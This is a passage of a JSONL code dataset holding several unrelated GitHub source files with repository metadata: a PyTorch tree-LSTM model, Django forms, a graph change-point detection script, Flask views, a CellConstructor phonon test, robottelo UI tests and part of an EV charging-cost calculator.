nn.ReLU())\n\n\t\tself.tree_lstm_compare=BinaryTreeLSTM(torch.cuda.is_available(),embedding_size,num_units, self.word_embedding, num_words)\n\n\t\tself.linear_layer_aggregate = nn.Sequential(nn.Dropout(p=0.5), nn.Linear(4*num_units, num_units), nn.ReLU(),\n\t\t\t\t\t\t\t\t\t\t\t\t\tnn.Dropout(p=0.5), nn.Linear(num_units, num_classes))\n\n\t\tself.init_weight()\n\n\tdef init_weight(self):\n\t\t#nn.init.normal(self.linear_layer_project,mean=0,std=0.1)\n\t\t#print(self.linear_layer_attend[3])\n\t\t#self.linear_layer_attend[1].weight.data.normal_(0, 0.01)\n\t\t#self.linear_layer_attend[1].bias.data.fill_(0)\n\t\t#self.linear_layer_attend[4].weight.data.normal_(0, 0.01)\n\t\t#self.linear_layer_attend[4].bias.data.fill_(0)\n\t\tself.linear_layer_compare[0].weight.data.normal_(0, 0.01)\n\t\tself.linear_layer_compare[0].bias.data.fill_(0)\n\t\t#self.linear_layer_compare[4].weight.data.normal_(0, 0.01)\n\t\t#self.linear_layer_compare[4].bias.data.fill_(0)\n\t\tself.linear_layer_aggregate[1].weight.data.normal_(0, 0.01)\n\t\tself.linear_layer_aggregate[1].bias.data.fill_(0)\n\t\tself.linear_layer_aggregate[4].weight.data.normal_(0, 0.01)\n\t\tself.linear_layer_aggregate[4].bias.data.fill_(0)\n\t\tself.word_embedding.weight.data.copy_(torch.from_numpy(self.pretrained_emb))\n\n\tdef attention_softmax3d(self,raw_attentions):\n\t\treshaped_attentions = raw_attentions.view(-1, raw_attentions.size(2))\n\t\tout=nn.functional.softmax(reshaped_attentions, dim=1)\n\t\treturn out.view(raw_attentions.size(0),raw_attentions.size(1),raw_attentions.size(2))\n\n\tdef _transformation_input(self,embed_sent, tree, PAD=True):\n\n\t\tembed_sent = self.word_embedding(embed_sent)\n\t\tembed_sent = self.dropout(embed_sent)\n\t\t#print('intra:')\n\t\t#print(embed_sent)\n\t\t_=self.tree_lstm_intra(tree, embed_sent, PAD)\n\t\t#print(len(self.tree_lstm_intra.all_ststes))\n\t\toutput=torch.cat(self.tree_lstm_intra.all_ststes,0)\n\t\t#embed_sent=torch.cat(self.tree_lstm_intra.all_words,0)\n\t\tdel self.tree_lstm_intra.all_ststes[:]\n\t\t#del self.tree_lstm_intra.all_words[:]\n\t\t#gc.collect()\n\t\treturn output\n\n\tdef attend(self,sent1,sent2):\n\n\t\trepr2=torch.transpose(sent2,1,2)\n\t\tself.raw_attentions = torch.matmul(sent1, repr2)\n\t\tatt_sent1 = self.attention_softmax3d(self.raw_attentions)\n\t\tbeta = torch.matmul(att_sent1, sent2)\n\n\t\traw_attentions_t = torch.transpose(self.raw_attentions, 1, 2).contiguous()\n\t\tatt_sent2 = self.attention_softmax3d(raw_attentions_t)\n\t\talpha = torch.matmul(att_sent2, sent1)\n\n\t\treturn alpha, beta\n\n\tdef compare(self,sentence,soft_alignment, tree, PAD=False):\n\n\t\tsent_alignment=torch.cat([sentence, soft_alignment, sentence-soft_alignment, sentence * soft_alignment],2)\n\t\tsent_alignment = self.linear_layer_compare(sent_alignment)\n\t\tsent_alignment = self.dropout(sent_alignment)\n\n\t\t#print('compare:')\n\t\t#print(sent_alignment)\n\t\tsent_alignment=sent_alignment[0]\n\t\t_=self.tree_lstm_compare(tree, sent_alignment,PAD)\n\t\toutput = torch.cat(self.tree_lstm_compare.all_ststes, 0)\n\t\tdel self.tree_lstm_compare.all_ststes[:]\n\t\t#gc.collect()\n\t\treturn output\n\n\tdef aggregate(self,v1, v2):\n\n\t\tv1_mean = torch.mean(v1, 1)\n\t\tv2_mean = torch.mean(v2, 1)\n\t\tv1_max, _ = torch.max(v1, 1)\n\t\tv2_max, _ = torch.max(v2, 1)\n\t\tout = self.linear_layer_aggregate(torch.cat((v1_mean, v1_max, v2_mean, v2_max), 1))\n\n\t\treturn out\n\n\tdef forward(self,sent1, sent2,tree1, tree2):\n\t\tsent1=self._transformation_input(sent1, tree1)\n\t\tsent2=self._transformation_input(sent2, tree2)\n\t\tsent1=torch.unsqueeze(sent1,0)\n\t\tsent2=torch.unsqueeze(sent2,0)\n\t\talpha, beta = self.attend(sent1, sent2)\n\t\tv1=self.compare(sent1,beta, tree1)\n\t\tv2=self.compare(sent2,alpha, tree2)\n\t\tv1 = torch.unsqueeze(v1, 0)\n\t\tv2 = torch.unsqueeze(v2, 0)\n\t\tlogits=self.aggregate(v1,v2)\n\t\treturn logits","repo_name":"lanwuwei/SPM_toolkit","sub_path":"ESIM/Tree_IM/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10236,"program_lang":"python","lang":"en","doc_type":"code","stars":301,"dataset":"github-code","pt":"21"} +{"seq_id":"74665343731","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom .widgets import DatePickerInput, TimePickerInput\nfrom .models import *\n\nclass CreateUserForm(UserCreationForm):\n PROFILE_CATEGORY = (\n ('Student', 'Student'),\n ('Professional', 'Professional'),\n )\n\n DOB = forms.DateField(\n help_text='Required.',\n widget=forms.SelectDateWidget(years=range(1960, 2030))\n )\n Bio = forms.CharField(\n widget=forms.Textarea(attrs={\n 'cols': 30,\n 'rows': 3\n }),\n required=False\n )\n University = forms.CharField(required=False)\n Profession = forms.CharField(\n widget=forms.Select(choices=PROFILE_CATEGORY),\n help_text='Required.'\n )\n #profile_pic = forms.ImageField(required=False)\n\n class Meta:\n model = User\n fields = [\"username\", \"email\", \"first_name\", \"last_name\", \"DOB\", \"Bio\", \"University\", \"Profession\", \"password1\", \"password2\"]\n\nclass UpdateUserForm(forms.ModelForm):\n PROFILE_CATEGORY = (\n ('Student', 'Student'),\n ('Professional', 'Professional'),\n )\n\n DOB = forms.DateField(\n help_text='Required.',\n widget=forms.SelectDateWidget(years=range(1960, 2030))\n )\n Bio = forms.CharField(\n widget=forms.Textarea(attrs={\n 'cols': 30,\n 'rows': 3\n }),\n required=False\n )\n University = forms.CharField(required=False)\n Profession = forms.CharField(\n widget=forms.Select(choices=PROFILE_CATEGORY),\n help_text='Required.'\n )\n profile_pic = forms.ImageField(required=False)\n\n class Meta:\n model = User\n fields = [\"first_name\", \"last_name\", \"DOB\", \"Bio\", \"University\", \"Profession\",\"profile_pic\"]\n\n\nclass addSubject(forms.ModelForm):\n code = forms.CharField(help_text='Required.')\n subject = forms.CharField(help_text='Required.')\n\n class Meta:\n model = Attendance\n fields = [\"code\", \"subject\"]\n\n\nclass addLog(forms.ModelForm):\n EXPENSE_CATEGORY = (\n ('Health', 'Health'),\n ('Education', 'Education'),\n ('Food', 'Food'),\n ('Personal', 'Personal'),\n )\n item = forms.CharField(help_text='Required.')\n price = forms.IntegerField(\n help_text='Required.',\n validators=[MinValueValidator(1)]\n )\n date = forms.DateField(\n help_text='Required.',\n widget= forms.SelectDateWidget(years=range(2010, 2030)),\n initial=timezone.now()\n )\n category = forms.Select(choices=EXPENSE_CATEGORY)\n quantity = forms.IntegerField(\n help_text='Required.',\n validators=[MinValueValidator(1), MaxValueValidator(10)]\n )\n\n class Meta:\n model = Expense\n fields = ['item', 'price', 'date', 'category', 'quantity']\n\n\nclass addPointer(forms.ModelForm):\n SEM_CATEGORY = (\n ('Sem 1', 'Sem 1'),\n ('Sem 2', 'Sem 2'),\n ('Sem 3', 'Sem 3'),\n ('Sem 4', 'Sem 4'),\n ('Sem 5', 'Sem 5'),\n ('Sem 6', 'Sem 6'),\n ('Sem 7', 'Sem 7'),\n ('Sem 8', 'Sem 8'),\n )\n semester = forms.Select(choices=SEM_CATEGORY)\n code = forms.CharField(help_text='Required.')\n subject = forms.CharField(help_text='Required.')\n credits = forms.FloatField(help_text='Required.')\n pointer = forms.IntegerField(\n help_text='Required.',\n validators=[MinValueValidator(1), MaxValueValidator(10)]\n )\n\n class Meta:\n model = Grade\n fields = ['semester', 'code', 'subject', 'credits', 'pointer']\n\n\nclass addReminders(forms.ModelForm):\n code = forms.CharField(help_text='Required.')\n subject = forms.CharField(help_text='Required.')\n task = forms.CharField(\n widget=forms.Textarea(attrs={\n 'cols': 30,\n 'rows': 3\n }),\n help_text='Required.'\n )\n date = forms.DateField(\n help_text='Required.',\n widget=DatePickerInput\n )\n time = forms.TimeField(\n help_text='Required.',\n widget=TimePickerInput\n )\n\n class Meta:\n model = Reminders\n fields = ['code','subject','task','date', 'time']\n\n widgets = {\n 'date': DatePickerInput(),\n 'time': TimePickerInput(),\n }","repo_name":"akshitajindal/SelfFolio","sub_path":"SelfFolio/SelF/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19552830386","text":"import math\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport random\nfrom scipy.linalg import subspace_angles\nimport csv\n\n### HELPER FUNCTIONS ###\n\ndef subspace_dist(A, B):\n '''\n Inputs: \n A, B - Two subspaces (columns of each matrix are basis for the subspace)\n Outputs: The distance between the two subspaces, defined as the Frobenius norm of the sine of principal angles\n '''\n return np.linalg.norm(np.sin(subspace_angles(A, B)))\n\ndef post_change_subspace(alpha, n, k):\n '''\n Inputs: \n alpha - index of node with highest node-centrality\n n - num of nodes\n k - dimension of subspace to use\n Outputs: Expected leading eigenvector\n '''\n eig = 0.0*np.ones((n, 1))\n eig[alpha, 0] += 1\n return eig\n\n \ndef save_gamma_hats_csv(param_hats):\n '''\n Save csv of estimate post-change parameter values over time\n Returns nothing\n '''\n data = np.array([range(len(param_hats)), param_hats]).T\n file = open('nc_gamma_hats.csv', 'w', newline ='')\n with file: \n header = ['# Index', 'Gamma_hat'] \n writer = csv.writer(file) \n writer.writerow(header)\n writer.writerows(data)\n \ndef save_cusum_csv(cusum, cs):\n '''\n Save csv of cusum value over time for different values of c\n Returns nothing\n '''\n\n data = [range(len(cusum[cs[0]]))]\n for c in cs:\n data.append(cusum[c])\n data = np.array(data).T\n headers = [str(c) for c in cs]\n\n file = open('nc_cusum.csv', 'w', newline ='')\n with file: \n header = ['# Index'] + headers\n writer = csv.writer(file)\n writer.writerow(header)\n writer.writerows(data)\n\ndef save_adjacency_csv(A, name):\n '''\n Save csv of adjacency matrix with given name (A0 or A1)\n Returns nothing\n '''\n np.savetxt('ef_' + name + '.csv', A, delimiter=\",\")\n\nif __name__ == \"__main__\":\n\n ### INITIAL GRAPH: ERDOS-RENYI(n, p) ###\n\n n = 100 # number of nodes\n p = 2*math.log(n)/n\n\n G0 = nx.generators.random_graphs.erdos_renyi_graph(n, p)\n A0 = nx.to_numpy_matrix(G0)\n\n ### POST-CHANGE GRAPH: SBM (2 COMMUNITIES) ###\n m_param = 1\n G1 = nx.generators.random_graphs.barabasi_albert_graph(n, m_param)\n ec = nx.eigenvector_centrality(G1)\n centrality = [ec[i] for i in range(n)]\n max_centrality_node = np.argmax(centrality)\n\n A1_old = nx.to_numpy_matrix(G1)\n\n perm = np.random.permutation(100)\n alpha = np.where(perm == max_centrality_node)[0][0]\n print(alpha)\n A1 = np.zeros(A1_old.shape)\n for i in range(n):\n for j in range(i+1):\n A1[i, j] = A1_old[perm[i], perm[j]]\n A1[j, i] = A1_old[perm[i], perm[j]]\n\n # plt.imshow(A0)\n # plt.title(\"Initial Adjacency Matrix\")\n # plt.show()\n # plt.imshow(A1)\n # plt.title(\"Post-Change Adjacency Matrix\")\n # plt.show()\n\n\n # ### GENERATE SIGNALS ###\n\n # Define graph filter\n poly = lambda x: x**2\n H0 = poly(A0)\n H1 = poly(A1)\n\n # Signal parameters\n m = 1000 # number of signals to generate\n t_cp = 600 # index of change point\n\n # Generate signals\n W = np.random.multivariate_normal(np.zeros(n), np.eye(n), m).T\n Y0 = np.dot(H0, W[:, 0:t_cp])\n Y1 = np.dot(H1, W[:, t_cp:m+1])\n Y = np.concatenate((Y0, Y1), axis=1)\n\n # ### DETECTION SETUP ###\n\n k = 1 # Number of eigenvectors to consider\n cusum = {} # dictionary from c -> cusum score over time\n cs = [0.0, 0.05, 0.10] # values of c to try\n window_size = 50 # For covariance estimates\n\n wA, U = np.linalg.eigh(A0)\n U0 = U[:, -k:] # Initial subspace\n\n alphas = np.array(range(100)) # Possible parameter values (alpha = index of node with highest eigenvector centrality)\n U1 = {a:post_change_subspace(a, n, k) for a in alphas} # Dict alpha: subspace(alpha)\n\n\n\n\n # ### DETECTION ###\n alpha_hats = []\n alphas_saved = False\n\n for c in cs:\n cusum[c] = [0]\n for i in range(m - window_size + 1):\n window = Y[:, i:i+window_size] # Signals in the current window\n C_hat = (1/window_size) * np.dot(window, window.T) # Empirical covariance\n wCs, Us = np.linalg.eigh(C_hat)\n U_hat = Us[:, -k:] # observed subspace\n alpha_hat = max(alphas, key=lambda a: np.linalg.norm(U1[a].T @ U_hat)) # Parameter estimate\n if not alphas_saved:\n alpha_hats.append(alpha_hat)\n Lt = subspace_dist(U0, U1[alpha_hat]) - subspace_dist(U_hat, U1[alpha_hat]) - c\n cusum[c].append(max(0, cusum[c][-1] + Lt))\n alphas_saved = True\n\n\n\n # plt.plot(alpha_hats)\n # plt.xlabel('Index')\n # plt.ylabel('Predicted Value')\n # plt.title('Predicted Parameter Value Over Time')\n # plt.axvline(x=t_cp, color='r')\n # plt.show()\n\n save_gamma_hats_csv(alpha_hats)\n\n # for c in cs:\n # plt.plot(cusum[c])\n\n # plt.legend(cs)\n # plt.xlabel('Index')\n # plt.ylabel('CUSUM Score')\n # plt.title('Running CUSUM Statistic')\n # plt.axvline(x=t_cp, color='r')\n # plt.show()\n\n save_cusum_csv(cusum, cs)\n\n\n\n\n\n\n","repo_name":"chiraagk7/graph-cusum","sub_path":"Node Centrality Change/node_centrality_cpd.py","file_name":"node_centrality_cpd.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1616652647","text":"from pprint import pprint as pp\nimport requests\nimport string\nimport shoplist_v1_0 as sl\nimport shoplist_v1_1 as sl2\n\n\"\"\"\nModuł tworzy listę zakupów na kilka literek oraz zapisuje ją do pliku\n\"\"\"\n\n\ndef main():\n # letters = string.ascii_lowercase\n recipe_list_all_letters = []\n letters = 'ad'\n for letter in letters:\n meals_a_json = sl.request_recipe(letter)\n recipe_list = sl.get_recipe_list(meals_a_json)\n for meals_dict in recipe_list:\n recipe_list_all_letters.append(meals_dict)\n print(recipe_list_all_letters)\n dict_of_meals = sl.get_recipe(recipe_list_all_letters)\n ingredients_list = sl.get_ingredients_list(dict_of_meals)\n ingredients_dictionary = sl.get_ingredients_dict(ingredients_list)\n sl2.export_to_csv(ingredients_dictionary)\n\n print(f'---------------------Nazwy przepisów:------------------------')\n sl.get_names_of_recipes(recipe_list_all_letters)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DominikaJastrzebska/project_shoplist_1.0","sub_path":"shoplist_v2_0.py","file_name":"shoplist_v2_0.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22177917820","text":"from flask import Blueprint, render_template, url_for\nfrom pybo import db\nfrom pybo.models import User_info, Question, Answer\nimport os\nfrom datetime import datetime\nfrom werkzeug.utils import import_string, redirect\n\n# basdir = os.path.abspath(os.path.dirname(__file__))\n# dbfile = os.path.join(basdir, 'db.sqlite')\n\nbp = Blueprint('main', __name__, url_prefix='/')\n\n\n@bp.route('/hello')\ndef hello_pybo():\n q1 = User_info(id='abc', pw='ab123', name='가나다', age=20, addr='서울', birth='020101', sex='m', create_date='210101')\n q2 = User_info(id='def', pw='de456', name='마바사', age=21, addr='부산', birth='010101', sex='f', create_date='210102')\n q3 = User_info(id='ghi', pw='gh789', name='아자차', age=22, addr='대전', birth='000101', sex='m', create_date='210301')\n q4 = User_info(id='jkl', pw='jk321', name='카타파', age=23, addr='울산', birth='990101', sex='f', create_date='210403')\n q5 = User_info(id='mno', pw='mn654', name='하거너', age=24, addr='광주', birth='980101', sex='m', create_date='210203')\n q6 = User_info(id='pqr', pw='pq987', name='더러머', age=25, addr='제주', birth='970101', sex='f', create_date='210305')\n q7 = User_info(id='stu', pw='st135', name='버서어', age=26, addr='강원', birth='960101', sex='m', create_date='200203')\n q8 = User_info(id='vwx', pw='vw246', name='저처커', age=27, addr='청주', birth='950101', sex='f', create_date='190503')\n q9 = User_info(id='yza', pw='yz369', name='허고노', age=28, addr='대구', birth='940101', sex='m', create_date='210813')\n q10 = User_info(id='bcd', pw='bc012', name='도로모', age=29, addr='경기', birth='930101', sex='f', create_date='201224')\n\n db.session.add(q1)\n db.session.add(q2)\n db.session.add(q3)\n db.session.add(q4)\n db.session.add(q5)\n db.session.add(q6)\n db.session.add(q7)\n db.session.add(q8)\n db.session.add(q9)\n db.session.add(q10)\n db.session.commit()\n return 'Hello, Pybo!'\n\n\n@bp.route('/')\ndef index():\n return redirect(url_for('question._list'))\n\n# @bp.route('/detail//')\n# def detail(question_id):\n# question = Question.query.get_or_404(question_id)\n# return render_template('question/detail.html', question=question)\n\n\n\n\n# @bp.route('/hello')\n# def hello_pybo():\n# result = Question.query.filter(Question.id=1).all\n# result = Question.query.get(1) #id(primary key)가 1번데이터를 가져옴\n# q = Question.query.get(2)\n# print(q)\n# # a = Answer(question = q, content='답변 3번', create_date=datetime.now())\n# # db.session.add(a)\n#\n# db.session.commit()\n#\n# return 'Hello, Pybo!'\n\n","repo_name":"v2rgo91/Myproject","sub_path":"pybo/views/main_views.py","file_name":"main_views.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19023833720","text":"import cellconstructor as CC\nimport cellconstructor.Phonons\n\nimport sys, os\nimport numpy as np\n\nEPS = 1e-8\n\ndef test_get_harmonic_energy_force():\n total_path = os.path.dirname(os.path.abspath(__file__))\n os.chdir(total_path)\n\n # Load the dynamical matrix\n dyn = CC.Phonons.Phonons(\"PbTe.dyn\", 8)\n super_struct = dyn.structure.generate_supercell(dyn.GetSupercell())\n \n # Generate a set of structures\n structs = dyn.ExtractRandomStructures(20, 300)\n xats = np.array([x.coords for x in structs])\n u_disps = xats - np.tile(super_struct.coords, (len(structs), 1,1))\n u_disps = u_disps.reshape((len(structs), 3 * super_struct.N_atoms))\n\n super_dyn = dyn.GenerateSupercellDyn(dyn.GetSupercell())\n\n en1, forc1 = dyn.get_energy_forces(None, displacement = u_disps)\n en2, forc2 = super_dyn.get_energy_forces(None, displacement = u_disps)\n\n en_dist = np.max(np.abs(en1 - en2))\n assert en_dist < EPS, \"Error, energy difference between two methods: {}\".format(en_dist)\n f_dist = np.max(np.abs(forc1 - forc2))\n assert f_dist < EPS, \"Error, the force difference between two methods: {}\".format(f_dist)\n\n \nif __name__ == \"__main__\":\n test_get_harmonic_energy_force()\n","repo_name":"SSCHAcode/CellConstructor","sub_path":"tests/TestHarmEnergyForce/test_supercell_harm_energy_force.py","file_name":"test_supercell_harm_energy_force.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"38460318526","text":"# -*- encoding: utf-8 -*-\n\"\"\"Test class for Puppet Smart Variables\n\n:Requirement: Variables\n\n:CaseAutomation: Automated\n\n:CaseLevel: Acceptance\n\n:CaseComponent: UI\n\n:TestType: Functional\n\n:CaseImportance: High\n\n:Upstream: No\n\"\"\"\nimport yaml\nfrom nailgun import entities\n\nfrom robottelo.api.utils import publish_puppet_module\nfrom robottelo.constants import DEFAULT_LOC_ID, CUSTOM_PUPPET_REPO, ENVIRONMENT\nfrom robottelo.datafactory import gen_string\nfrom robottelo.decorators import tier2, upgrade, fixture\n\nPUPPET_MODULES = [\n {'author': 'robottelo', 'name': 'ui_test_variables'}]\n\n\n@fixture(scope='module')\ndef module_org():\n return entities.Organization().create()\n\n\n@fixture(scope='module')\ndef module_loc():\n return entities.Location(id=DEFAULT_LOC_ID).read()\n\n\n@fixture(scope='module')\ndef content_view(module_org):\n return publish_puppet_module(\n PUPPET_MODULES, CUSTOM_PUPPET_REPO, module_org)\n\n\n@fixture(scope='module')\ndef puppet_env(content_view, module_org):\n return entities.Environment().search(\n query={'search': u'content_view=\"{0}\" and organization_id={1}'.format(\n content_view.name, module_org.id)}\n )[0]\n\n\n@fixture(scope='module')\ndef puppet_class(puppet_env):\n puppet_class_entity = entities.PuppetClass().search(query={\n 'search': u'name = \"{0}\" and environment = \"{1}\"'.format(\n PUPPET_MODULES[0]['name'], puppet_env.name)})[0]\n # We need to have at least one variable created to unblock WebUI for Smart\n # Variable interface page\n if len(entities.SmartVariable(\n puppetclass=puppet_class_entity).search({'puppetclass'})) == 0:\n entities.SmartVariable(puppetclass=puppet_class_entity).create()\n return puppet_class_entity\n\n\n@fixture(scope='module')\ndef puppet_subclasses(puppet_env):\n return entities.PuppetClass().search(query={\n 'search': u'name ~ \"{0}::\" and environment = \"{1}\"'.format(\n PUPPET_MODULES[0]['name'], puppet_env.name)\n })\n\n\n@fixture(scope='module')\ndef module_host(\n module_org, module_loc, content_view, puppet_env, puppet_class):\n lce = entities.LifecycleEnvironment().search(\n query={\n 'search': 'organization_id=\"{0}\" and name=\"{1}\"'.format(\n module_org.id, ENVIRONMENT)\n })[0]\n host = entities.Host(\n organization=module_org,\n location=module_loc,\n content_facet_attributes={\n 'content_view_id': content_view.id,\n 'lifecycle_environment_id': lce.id,\n }).create()\n host.environment = puppet_env\n host.update(['environment'])\n host.add_puppetclass(data={'puppetclass_id': puppet_class.id})\n return host\n\n\n@fixture(scope='module')\ndef domain(module_host):\n return entities.Domain(id=module_host.domain.id).read()\n\n\n@tier2\n@upgrade\ndef test_positive_create_with_host(session, puppet_class, module_host):\n \"\"\"Creates a Smart Variable and associate it with host.\n\n :id: 4a8589bf-7b11-48e8-a25d-984bea2ba676\n\n :steps: Creates a smart variable with valid name and default value.\n\n :expectedresults:\n\n 1. The smart Variable is created successfully.\n 2. In YAML output of associated host, the variable with name and\n its default value is displayed.\n 3. In Host-> variables tab, the smart variable should be displayed\n with its respective puppet class.\n\n :CaseLevel: Integration\n \"\"\"\n name = gen_string('alpha')\n value = gen_string('alpha')\n with session:\n session.smartvariable.create({\n 'variable.key': name,\n 'variable.puppet_class': puppet_class.name,\n 'variable.default_value': value,\n })\n assert session.smartvariable.search(name)[0]['Variable'] == name\n output = yaml.load(session.host.read_yaml_output(module_host.name))\n output_scp = output['parameters'][name]\n assert output_scp == value\n host_values = session.host.read(module_host.name)\n smart_variable = next((\n item\n for item in host_values['parameters']['puppet_class_parameters']\n if item['Name'] == name\n ))\n assert smart_variable['Puppet Class'] == puppet_class.name\n assert smart_variable['Value'] == value\n\n\n@tier2\ndef test_positive_create_matcher(session, puppet_class, module_host):\n \"\"\"Create a Smart Variable with matcher.\n\n :id: 42113584-d2db-4b91-8775-06bffee36be4\n\n :steps:\n\n 1. Create a smart Variable with valid name and default value.\n 2. Create a matcher for Host attribute with valid value.\n\n :expectedresults:\n\n 1. The smart Variable with matcher is created successfully.\n 2. In YAML output, the variable name with overrided value for host\n is displayed.\n 3. In Host-> variables tab, the variable name with overrided value\n for host is displayed.\n\n :CaseLevel: Integration\n \"\"\"\n name = gen_string('alpha')\n default_value = gen_string('alpha')\n override_value = gen_string('alphanumeric')\n with session:\n session.smartvariable.create({\n 'variable.key': name,\n 'variable.puppet_class': puppet_class.name,\n 'variable.default_value': default_value,\n 'variable.matchers': [\n {\n 'Attribute type': {\n 'matcher_attribute_type': 'fqdn',\n 'matcher_attribute_value': module_host.name\n },\n 'Value': override_value\n }\n ]\n })\n assert session.smartvariable.search(name)[0]['Variable'] == name\n output = yaml.load(session.host.read_yaml_output(module_host.name))\n output_scp = output['parameters'][name]\n assert output_scp == override_value\n host_values = session.host.read(module_host.name)\n smart_variable = next((\n item\n for item in host_values['parameters']['puppet_class_parameters']\n if item['Name'] == name\n ))\n assert smart_variable['Value'] == override_value\n\n\n@tier2\ndef test_positive_create_matcher_attribute_priority(\n session, puppet_class, module_host, domain):\n \"\"\"Matcher Value set on Attribute Priority for Host - alternate\n priority.\n\n :id: 65144295-f0ca-4bd0-ae01-96c50ca829fe\n\n :steps:\n\n 1. Create variable with some default value.\n 2. Set some attribute(other than fqdn) as top priority attribute.\n Note - The fqdn/host should have this attribute.\n 3. Create first matcher for fqdn with valid details.\n 4. Create second matcher for attribute of step 2 with valid\n details.\n 5. Submit the change.\n 6. Go to YAML output of associated host.\n\n :expectedresults:\n\n 1. The YAML output has the value only for step 4 matcher.\n 2. The YAML output doesn't have value for fqdn/host matcher.\n\n :CaseLevel: Integration\n \"\"\"\n name = gen_string('alpha')\n override_value = gen_string('alphanumeric')\n override_value2 = gen_string('alphanumeric')\n with session:\n session.smartvariable.create({\n 'variable.key': name,\n 'variable.puppet_class': puppet_class.name,\n 'variable.default_value': gen_string('alpha'),\n 'variable.prioritize_attribute_order.order': '\\n'.join(\n ['domain', 'hostgroup', 'os', 'fqdn']),\n 'variable.matchers': [\n {\n 'Attribute type': {\n 'matcher_attribute_type': 'fqdn',\n 'matcher_attribute_value': module_host.name\n },\n 'Value': override_value\n },\n {\n 'Attribute type': {\n 'matcher_attribute_type': 'domain',\n 'matcher_attribute_value': domain.name\n },\n 'Value': override_value2\n }\n ]\n })\n assert session.smartvariable.search(name)[0]['Variable'] == name\n output = yaml.load(session.host.read_yaml_output(module_host.name))\n output_scp = output['parameters'][name]\n assert output_scp == override_value2\n","repo_name":"sghai/robottelo","sub_path":"tests/foreman/ui_airgun/test_smartvariable.py","file_name":"test_smartvariable.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"9697396683","text":"import requests\nfrom datetime import datetime, timedelta\nimport holidays\n\n\"\"\"\nThis file consist of a Calculator class and its methods to calculate the charging cost.\n\"\"\"\n\nclass Calculator():\n \"\"\"\n Calculator class for the Joules Up EV Charging Calculator\n \"\"\"\n # you can choose to initialise variables here, if needed.\n period = 1\n power = 0\n price = 0\n duration = 0\n start_time = \"00:00\"\n\n def __init__(self):\n pass\n\n def cost_calculation(self, date, start_time, initial_state, final_state, capacity, charger_config):\n \"\"\"\n This function is used to calculate the charging cost based on the formula in our assignment 2 specs\n Cost = ( Final SoC - Initial SoC ) * Capacity * Base Price * Surcharge\n \"\"\"\n # format the date into an accepted date for the functions\n formatted_date = Calculator.format_date(self, date)\n ref_date = Calculator.check_date(self, formatted_date)\n # find the charger configuration for the charger\n Calculator.get_charger_configuration(self, charger_config)\n current = datetime.strptime(start_time, \"%H:%M\")\n\n # check for peak time and holiday\n if Calculator.is_peak(self, current):\n price = Calculator.price * 2\n else:\n price = Calculator.price\n\n if Calculator.is_holiday(self, ref_date):\n surcharge_factor = 1.1\n else:\n surcharge_factor = 1\n\n # calculate the cost using the formula\n cost = (float(final_state) - float(initial_state)) / 100 * float(capacity) * float(price) / 100 * surcharge_factor\n return \"{:.2f}\".format(cost)\n\n def cost_cal_without_hourly_weather(self, date, postcode, start_time, charging_duration, charger_configuration, initial_state, final_state, location):\n \"\"\"\n This function calculate the cost from 1st July 2008 up to the current date-2 only. The calculation is done without\n considering hourly weather conditions.\n Formula : SoC * Net_energy * surcharge * price\n \"\"\"\n total_cost = 0\n formatted_date = Calculator.format_date(self, date)\n ref_date = Calculator.check_date(self, formatted_date)\n Calculator.get_charger_configuration(self, charger_configuration)\n # calculate the solar energy\n energy = Calculator.solar_energy_cal_without_future(self, ref_date, postcode, start_time, charging_duration, location)\n # energy is a tuple while the first element is the solar energy and second element is the duration of each\n # partial hour\n solar_energy = energy[0]\n du = energy[1]\n price = Calculator.get_price(self)\n # calculate the cost for each partial hour\n for i in range(len(solar_energy)):\n solar = solar_energy[i]\n energy_drawn = Calculator.power * du[i]\n net_energy = energy_drawn - float(solar)\n soc = (int(final_state) - int(initial_state))/100\n if Calculator.is_holiday(self, ref_date):\n surcharge = 1.1\n else:\n surcharge = 1.0\n\n if net_energy <= 0:\n total_cost += 0\n else:\n total_cost += soc * net_energy * surcharge * price[i]\n\n return \"{:.2f}\".format(total_cost)\n\n def cost_cal_with_hourly_weather(self, date, postcode, start_time, charging_duration, charger_configuration,\n initial_state, final_state, location):\n \"\"\"\n This function calculate the charging cost with the addition of solar energy generation, with the date extending\n to the future. Moreover, the calculation needs to take into account hourly weather conditions.\n Formula: soc * net_energy * surcharge * price\n \"\"\"\n total_cost = 0\n formatted_date = Calculator.format_date(self, date)\n ref_date = Calculator.check_date(self, formatted_date)\n Calculator.get_charger_configuration(self, charger_configuration)\n # find the solar energy for each years and the duration of each solar energy period\n energy = Calculator.solar_energy_cal_preceeding_years(self, ref_date, postcode, start_time, charging_duration, location)\n price = Calculator.get_price(self)\n # calculate the cost for each period and sum them up\n for i in range(len(energy)):\n info = energy[i]\n for j in range(len(info)):\n if len(info[0]) > 1:\n solar = info[0]\n du = info[1]\n solar_energy = solar[j]\n energy_drawn = Calculator.power * du[j]\n else:\n solar = info[0]\n du = info[1]\n solar_energy = solar[0]\n energy_drawn = Calculator.power * du[0]\n\n net_energy = energy_drawn - float(solar_energy)\n soc = (int(final_state) - int(initial_state)) / 100\n if Calculator.is_holiday(self, ref_date):\n surcharge = 1.1\n else:\n surcharge = 1.0\n\n if net_energy <= 0:\n total_cost += 0\n else:\n if len(info[0]) > 1:\n total_cost += soc * net_energy * surcharge * price[j]\n else:\n total_cost += soc * net_energy * surcharge * price[0]\n return \"{:.2f}\".format(total_cost)\n\n def get_price(self):\n \"\"\"\n This 